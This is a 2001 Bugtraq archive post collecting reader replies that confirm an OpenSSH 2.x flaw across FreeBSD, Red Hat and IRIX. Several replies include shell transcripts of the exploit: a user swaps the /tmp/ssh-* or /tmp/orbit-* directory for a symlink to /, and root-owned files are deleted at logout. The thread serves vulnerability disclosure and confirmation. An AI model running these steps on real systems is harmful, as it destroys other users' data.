Home page logo

bugtraq logo Bugtraq mailing list archives

Re: SSH allows deletion of other users files...
From: aleph1 () securityfocus com
Date: Tue, 5 Jun 2001 11:30:37 -0600

Tomas Ericsson <te () matematik su se>

The vulnerability works perfectly for me:                                                                               
                                        sshd version OpenSSH_2.3.0 green () FreeBSD org 20010321

# uname -a
FreeBSD myhost 4.3-RELEASE FreeBSD 4.3-RELEASE #0: Sun Apr 22 01:05:25 GMT 2001
root () jkh101 osd bsdi com:/usr/src/sys/compile/GENERIC  alpha

[root () myhost root]# echo "testing">/cookies
[root () myhost root]# ls -l /cookies
-rw-r--r--  1 root  wheel  8 Jun  5 01:48 /cookies
[root () myhost root]# ssh -l te myhost
[te () myhost te]# rm -rf /tmp/ssh-1i24iea5
[te () myhost te]# ln -s / /tmp/ssh-1i24iea5
[te () myhost te]# logout
[root () myhost root]# ls -l /cookies
ls: /cookies: No such file or directory

Shannon Lee <shannon () scatter com>

reproduced with OpenSSH_2.3.0p1 on redhat 6.2.

TE <te () linux nu>

This vulnerability works fine on both RedHat 7.1 & 7.0 with the latest
updated packages from RedHat installed.

RH71# uname -a
Linux host1 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown
RH71# rpm -qa|grep openssh-server

RH70# uname -a 
Linux host2 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown
RH70# rpm -qa|grep openssh-server

"David Thiel" <dthiel () nexprise com>

I tested this on 4.3-RELEASE, and was successful.
SSH Version OpenSSH_2.3.0 green () FreeBSD org 20010321

KF <dotslash () snosoft com>

Works on my box

[root () bounce dotslash]# cat /etc/redhat-release
Red Hat Linux release 7.0 (Guinness)
root () bounce dotslash]# ssh -V
SSH Version OpenSSH_2.1.1, protocol versions 1.5/2.0.
Compiled with SSL (0x0090581f).

Jan-Frode Myklebust <janfrode () parallab uib no>

I just tested with OpenSSH_2.5.2p2 on RedHat 7.0,
and OpenSSH_2.9p1 on IRIX 6.5 and both are
vulnerable to this. I used protocol version 2 on
both machines.

Luciano Miguel Ferreira Rocha <strange () nsk yi org>

Confirmied on RedHat 7.0 w/ OpenSSH 2.5.2p1. It needs, of course, to have
X forwarding activated.

"Golden_Eternity" <bhodi () bigfoot com>

I tried to reproduce this on a system running ssh 2.4.0, but I was unable to
locate the /tmp/ssh-* directory.

What version of ssh were you using when you discovered this?

[test () shiva test]$ ssh test () localhost
warning: Need basic cursor movement capablity, using vt100
test's password:
Authentication successful.
Last login: Mon Jun 04 2001 10:42:08 -0700
No mail.
[test () shiva test]$ ls -l /tmp/
total 12
drwxr-xr-x    2 root     root        12288 Apr  8 11:59 lost+found
[test () shiva test]$

"Schlosser, Matt D." <mschlosser () eschelon com

On the contrary, it just takes another form:

[root () bob /root]# touch /cookies;ls /cookies
[root () bob /root]# ssh zen () localhost
zen () localhost's password:
[zen () bob zen]$ rm -r /tmp/orbit-zen/; ln -s / /tmp/orbit-zen
[zen () bob zen]$ logout
Connection to localhost closed.
[root () bob /root]# ls /cookies
/bin/ls: /cookies: No such file or directory

Elias Levy
Si vis pacem, para bellum

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]